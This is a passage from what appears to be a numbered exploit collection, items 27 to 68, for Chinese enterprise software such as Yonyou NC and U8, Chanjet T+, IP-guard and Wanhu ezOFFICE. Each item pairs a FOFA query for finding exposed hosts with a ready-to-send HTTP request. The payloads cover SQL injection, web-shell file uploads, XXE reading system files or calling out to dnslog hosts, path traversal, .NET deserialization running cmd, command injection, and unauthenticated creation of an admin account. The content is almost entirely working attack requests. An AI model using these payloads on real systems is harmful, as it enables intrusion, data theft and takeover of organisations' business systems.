User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; the executed command writes the given string to the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: access the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a cookie via the following endpoint:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zhejiang University Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
